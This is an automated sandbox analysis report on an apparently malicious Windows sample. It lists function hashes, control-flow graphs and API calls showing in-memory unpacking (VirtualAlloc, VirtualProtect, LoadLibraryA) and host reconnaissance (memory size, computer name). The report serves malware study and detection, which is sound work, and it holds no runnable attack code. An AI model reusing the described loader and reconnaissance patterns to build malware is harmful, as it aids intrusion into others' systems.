                                                                                                                                                                                                              Function 0043F780 Relevance: .4, Instructions: 367COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 93e5b3582f47801daab4a994dbe1ffdb8dbbeeeea99f4a4540b343aa2da0b435
                                                                                                                                                                                                              • Instruction ID: 6d96f7287296dea125509ebd23cdd92d88d0ad1b3c67d6175424725e3676d35a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93e5b3582f47801daab4a994dbe1ffdb8dbbeeeea99f4a4540b343aa2da0b435
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBA17672F083218BC728DE24C89166BB7A2EBD9300F1AD53ED98697355D639AC0987C1
                                                                                                                                                                                                              Function 0043EE70 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: acbaaf974f3ad55353a5afde006ae02707034657e12112375823482e1afaa727
                                                                                                                                                                                                              • Instruction ID: e18f649e546529377bf3a01260857f7cdbae874debf94cadb451cba3a2f4cd50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: acbaaf974f3ad55353a5afde006ae02707034657e12112375823482e1afaa727
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87714935A082019BCB18DF29D850A2FB3E2EFDD350F19D43EE985873A5EB349C519789
                                                                                                                                                                                                              Function 0043B1A0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: c29354023951ba189b78030c1a6babd1836c67dafb9782c2dc91a0b0b9bdfb91
                                                                                                                                                                                                              • Instruction ID: 4d4773b1d5516781c03215068937b98ce721de8a471e0920fed761e78ab14649
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c29354023951ba189b78030c1a6babd1836c67dafb9782c2dc91a0b0b9bdfb91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 416189366083044BD728DE64DCC176BB392EBD9300F19D57EDA848B392E7765C018BC9
                                                                                                                                                                                                              Function 0040E672 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 605e46f755210dcc9c0da62b95d27905939b104732a3df235dd1714a1aaf91ba
                                                                                                                                                                                                              • Instruction ID: c3089623b9e3368e7f8b682d30200594994b946a3c95ad14b04103bf8fb04565
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 605e46f755210dcc9c0da62b95d27905939b104732a3df235dd1714a1aaf91ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04517D77B106009FD715AF3ADCC273B72A3ABD5318F18083DE456A73D2DA3CA8058659
                                                                                                                                                                                                              Function 0040E2CE Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: d9f47a00cdc02831e61954dd521e1391d4054793574a3e978fbebeb9b66cf0c9
                                                                                                                                                                                                              • Instruction ID: cae4caa0a8c1025677c653afa2e18e3a8ee8d16afbcf87a5670b38fa9449bd37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9f47a00cdc02831e61954dd521e1391d4054793574a3e978fbebeb9b66cf0c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F5194366106019FE319CF2AC881722F7E3EFD9324F29866ED4565B3E5D774A8128B44
                                                                                                                                                                                                              Function 0042BA6D Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 7a5983e881f33d68e73c81bc0c50338dd42d7247078efa5b69dca4e19aaaa378
                                                                                                                                                                                                              • Instruction ID: 421292d289628c2ec28063948a5b776e44441af3a063dbb0a1d93cd7e2ec04a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a5983e881f33d68e73c81bc0c50338dd42d7247078efa5b69dca4e19aaaa378
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E310B746483958BD7198B25A8A073BBFD1DF93355F78086DE0C3473A1D3249C45CB99
                                                                                                                                                                                                              Function 00409CA0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 931e72134b3522e0373eced100f9446d56ca1b7712d33c327de1975d299fd239
                                                                                                                                                                                                              • Instruction ID: e5e35f6c30f5e2a170d1ccdb0b81da1aa2fbc574e4b98070eda34d0d44b77c4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 931e72134b3522e0373eced100f9446d56ca1b7712d33c327de1975d299fd239
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1210772B053504BE318CF39CC8569B7BD6ABD6318F09873CD4A55B2C6D734990AC685
                                                                                                                                                                                                              Function 00420515 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0dd6712335a4cca2d09baf438142087798eabd4d492edb18bd98594e903b922f
                                                                                                                                                                                                              • Instruction ID: 9e205eb619e0fdcba4f4a0d91f631a1642ebdafc9a1436f62b37a1c298d6d2b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dd6712335a4cca2d09baf438142087798eabd4d492edb18bd98594e903b922f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 261127B1A00622D7C720CF28D861237B7F1FF93360B58A615C4956B786F7389991CB8D
                                                                                                                                                                                                              Function 0042051D Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7116429d202a4228fde13b208bc1c124ce83d96c2f75f28deb0ed3e3fe334961
                                                                                                                                                                                                              • Instruction ID: 99ee83c2afa72f0d0c781c27911b0bc59b0e00a7417cb352cc8b3c4f04647dcb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7116429d202a4228fde13b208bc1c124ce83d96c2f75f28deb0ed3e3fe334961
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51106A1A00722D3C7218F28D861237B7B2FF93350B98A519C4D56B746F7389991CB8C
                                                                                                                                                                                                              Function 0043D5A1 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5e340f29cd1df72159c6b88eb651a7251a085d5565b0d01b4bc6e0ea9c07ef73
                                                                                                                                                                                                              • Instruction ID: 52df2764e7ded2afadc6ad1e2d293c3ab20e01d64d9fb601fdcf9eee6b244354
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e340f29cd1df72159c6b88eb651a7251a085d5565b0d01b4bc6e0ea9c07ef73
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401D679A04150EBDB198F18E8A153B73A6DB5B308F24242ED683A7351DB249C118B5C
                                                                                                                                                                                                              Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 494 247003c-2470047 495 247004c-2470263 call 2470a3f call 2470e0f call 2470d90 VirtualAlloc 494->495 496 2470049 494->496 511 2470265-2470289 call 2470a69 495->511 512 247028b-2470292 495->512 496->495 516 24702ce-24703c2 VirtualProtect call 2470cce call 2470ce7 511->516 513 24702a1-24702b0 512->513 515 24702b2-24702cc 513->515 513->516 515->513 523 24703d1-24703e0 516->523 524 24703e2-2470437 call 2470ce7 523->524 525 2470439-24704b8 VirtualFree 523->525 524->523 527 24705f4-24705fe 525->527 528 24704be-24704cd 525->528 530 2470604-247060d 527->530 531 247077f-2470789 527->531 529 24704d3-24704dd 528->529 529->527 535 24704e3-2470505 LoadLibraryA 529->535 530->531 536 2470613-2470637 530->536 533 24707a6-24707b0 531->533 534 247078b-24707a3 531->534 538 24707b6-24707cb 533->538 539 247086e-24708be LoadLibraryA 533->539 534->533 540 2470517-2470520 535->540 541 2470507-2470515 535->541 542 247063e-2470648 536->542 543 24707d2-24707d5 538->543 546 24708c7-24708f9 539->546 544 2470526-2470547 540->544 541->544 542->531 545 247064e-247065a 542->545 547 24707d7-24707e0 543->547 548 2470824-2470833 543->548 549 247054d-2470550 544->549 545->531 550 2470660-247066a 545->550 551 2470902-247091d 546->551 552 24708fb-2470901 546->552 553 24707e4-2470822 547->553 554 24707e2 547->554 558 2470839-247083c 548->558 555 2470556-247056b 549->555 556 24705e0-24705ef 549->556 557 247067a-2470689 550->557 552->551 553->543 554->548 559 247056f-247057a 555->559 560 247056d 555->560 556->529 561 2470750-247077a 557->561 562 247068f-24706b2 557->562 558->539 563 247083e-2470847 558->563 565 247057c-2470599 559->565 566 247059b-24705bb 559->566 560->556 561->542 567 24706b4-24706ed 562->567 568 24706ef-24706fc 562->568 569 247084b-247086c 563->569 570 2470849 563->570 577 24705bd-24705db 565->577 566->577 567->568 571 24706fe-2470748 568->571 572 247074b 568->572 569->558 570->539 571->572 572->557 577->549
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0247024D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                              • Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14
                                                                                                                                                                                                              Function 0042B2E5 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 355COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 613 42b2e5-42b306 614 42b310-42b355 613->614 614->614 615 42b357-42b35e 614->615 616 42b364-42b36a 615->616 617 42b6df-42b6e1 615->617 618 42b370-42b379 616->618 619 42b6e4-42b6ff 617->619 618->618 620 42b37b-42b37e 618->620 621 42b700-42b714 619->621 620->619 621->621 622 42b716-42b71d 621->622 623 42b73b-42b747 622->623 624 42b71f-42b723 622->624 626 42b761-42b782 call 43e770 623->626 627 42b749-42b74b 623->627 625 42b730-42b739 624->625 625->623 625->625 631 42b787-42b7ab GetPhysicallyInstalledSystemMemory 626->631 629 42b750-42b75d 627->629 629->629 630 42b75f 629->630 630->626 632 42b7b0-42b7c4 631->632 632->632 633 42b7c6-42b808 call 41de20 632->633 636 42b810-42b852 633->636 636->636 637 42b854-42b85b 636->637 638 42b87d-42b880 637->638 639 42b85d-42b868 637->639 641 42b884-42b88c 638->641 640 42b870-42b879 639->640 640->640 642 42b87b 640->642 643 42b89b-42b8a5 641->643 644 42b88e-42b88f 641->644 642->641 645 42b8a7-42b8ab 643->645 646 42b8bb-42b912 643->646 647 42b890-42b899 644->647 648 42b8b0-42b8b9 645->648 649 42b920-42b93b 646->649 647->643 647->647 648->646 648->648 649->649 650 42b93d-42b944 649->650 651 42b946-42b94a 650->651 652 42b95b-42b968 650->652 653 42b950-42b959 651->653 654 42b96a-42b971 652->654 655 42b98b-42ba03 652->655 653->652 653->653 656 42b980-42b989 654->656 657 42ba04 655->657 656->655 656->656 657->657
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID: CU$RFQy$l;`U$z;`U
                                                                                                                                                                                                              • API String ID: 3960555810-461700112
                                                                                                                                                                                                              • Opcode ID: 9a61ed3707dcb819620eb9b72200b665080708ecc9ccf67336aec33957438daa
                                                                                                                                                                                                              • Instruction ID: 4450fe3a4cd9cba408e9f5f34038f77dfd34b108d8a35ae970a4cd3e0dd6698b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a61ed3707dcb819620eb9b72200b665080708ecc9ccf67336aec33957438daa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BA1C174A0C3918AD715CF2A945036BFFE1AFE3305F68499EE0D587392D7398806CB96
                                                                                                                                                                                                              Function 0042A5A3 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 303COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 658 42a5a3-42b6ff call 4319e0 call 4080e0 664 42b700-42b714 658->664 664->664 665 42b716-42b71d 664->665 666 42b73b-42b747 665->666 667 42b71f-42b723 665->667 669 42b761-42b782 call 43e770 666->669 670 42b749-42b74b 666->670 668 42b730-42b739 667->668 668->666 668->668 674 42b787-42b7ab GetPhysicallyInstalledSystemMemory 669->674 672 42b750-42b75d 670->672 672->672 673 42b75f 672->673 673->669 675 42b7b0-42b7c4 674->675 675->675 676 42b7c6-42b808 call 41de20 675->676 679 42b810-42b852 676->679 679->679 680 42b854-42b85b 679->680 681 42b87d-42b880 680->681 682 42b85d-42b868 680->682 684 42b884-42b88c 681->684 683 42b870-42b879 682->683 683->683 685 42b87b 683->685 686 42b89b-42b8a5 684->686 687 42b88e-42b88f 684->687 685->684 688 42b8a7-42b8ab 686->688 689 42b8bb-42b912 686->689 690 42b890-42b899 687->690 691 42b8b0-42b8b9 688->691 692 42b920-42b93b 689->692 690->686 690->690 691->689 691->691 692->692 693 42b93d-42b944 692->693 694 42b946-42b94a 693->694 695 42b95b-42b968 693->695 696 42b950-42b959 694->696 697 42b96a-42b971 695->697 698 42b98b-42ba03 695->698 696->695 696->696 699 42b980-42b989 697->699 700 42ba04 698->700 699->698 699->699 700->700
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID: CU$RFQy$l;`U$z;`U
                                                                                                                                                                                                              • API String ID: 3960555810-461700112
                                                                                                                                                                                                              • Opcode ID: 10777dd44f7ac0a99ac2b221d05814f59396b05ce36df08a1bcedde27e36f601
                                                                                                                                                                                                              • Instruction ID: 4f5193a7f60610b5f5ffb64e57883cb1cbf6e14fcbf33ef3274a3339077fd52c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10777dd44f7ac0a99ac2b221d05814f59396b05ce36df08a1bcedde27e36f601
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B491C070A0C3918BD715CF2A945036BFFE1AFD2304F58495EE0D587392D73A8806CB96
                                                                                                                                                                                                              Function 0042B6DD Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 295COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 701 42b6dd-42b6ff 703 42b700-42b714 701->703 703->703 704 42b716-42b71d 703->704 705 42b73b-42b747 704->705 706 42b71f-42b723 704->706 708 42b761-42b7ab call 43e770 GetPhysicallyInstalledSystemMemory 705->708 709 42b749-42b74b 705->709 707 42b730-42b739 706->707 707->705 707->707 714 42b7b0-42b7c4 708->714 711 42b750-42b75d 709->711 711->711 712 42b75f 711->712 712->708 714->714 715 42b7c6-42b808 call 41de20 714->715 718 42b810-42b852 715->718 718->718 719 42b854-42b85b 718->719 720 42b87d-42b880 719->720 721 42b85d-42b868 719->721 723 42b884-42b88c 720->723 722 42b870-42b879 721->722 722->722 724 42b87b 722->724 725 42b89b-42b8a5 723->725 726 42b88e-42b88f 723->726 724->723 727 42b8a7-42b8ab 725->727 728 42b8bb-42b912 725->728 729 42b890-42b899 726->729 730 42b8b0-42b8b9 727->730 731 42b920-42b93b 728->731 729->725 729->729 730->728 730->730 731->731 732 42b93d-42b944 731->732 733 42b946-42b94a 732->733 734 42b95b-42b968 732->734 735 42b950-42b959 733->735 736 42b96a-42b971 734->736 737 42b98b-42ba03 734->737 735->734 735->735 738 42b980-42b989 736->738 739 42ba04 737->739 738->737 738->738 739->739
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID: CU$RFQy$l;`U$z;`U
                                                                                                                                                                                                              • API String ID: 3960555810-461700112
                                                                                                                                                                                                              • Opcode ID: 1f7a32c1a7e6a88faf6a08310750b0ca35e67a74b50c495e2dc7cbd3f92ca4b5
                                                                                                                                                                                                              • Instruction ID: 96ee4e31bc9202afdda2afef1036a51624070109c990ef8ca0c29cac23392fb9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f7a32c1a7e6a88faf6a08310750b0ca35e67a74b50c495e2dc7cbd3f92ca4b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9481AF70A0C3918AE715CF2A945076BFFE1AFE3305F58495EE0D587392D73A8806CB96
                                                                                                                                                                                                              Function 0042AC5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 864 42ac5f-42ac69 865 42ac8b-42acbb 864->865 866 42ac6b-42ac72 864->866 869 42acc0-42acfb 865->869 867 42ac80-42ac89 866->867 867->865 867->867 869->869 870 42acfd-42ad07 869->870 871 42ad1b-42ad7e GetComputerNameExA 870->871 872 42ad09 870->872 873 42ad10-42ad19 872->873 873->871 873->873
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042AD3D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID: c@$iu2
                                                                                                                                                                                                              • API String ID: 3545744682-3477820827
                                                                                                                                                                                                              • Opcode ID: 75a89827526749a1a1a007a98808a7d51fd3c4ac85d34ec0e96ecc2f3812b44c
                                                                                                                                                                                                              • Instruction ID: 3d839d535991c1d85afefe73884e3ba141c50531c9c363a2a6daa55da7d6be0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a89827526749a1a1a007a98808a7d51fd3c4ac85d34ec0e96ecc2f3812b44c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A2106303497D28BEB298E3584543EBBBD66BC6305F1C466D84CA8B385CB7840068752
                                                                                                                                                                                                              Function 0042AC5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042AD3D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID: c@$iu2
                                                                                                                                                                                                              • API String ID: 3545744682-3477820827
                                                                                                                                                                                                              • Opcode ID: 52f5a0ea6259d1a0f0fdc7417bb953db3f84d14775f594d19535e91b30c850e9
                                                                                                                                                                                                              • Instruction ID: bbd77dbc4ac7b9694708bb8d7f105731e2554e1f2ed9402ed29219d019095eb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52f5a0ea6259d1a0f0fdc7417bb953db3f84d14775f594d19535e91b30c850e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C521263575979287EB288E35C8583EFBBD76BC6315F1D8A7D848A8B384CB7840068752
                                                                                                                                                                                                              Function 0040C8F6 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C8FA
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA48
                                                                                                                                                                                                              Memory Dump Source
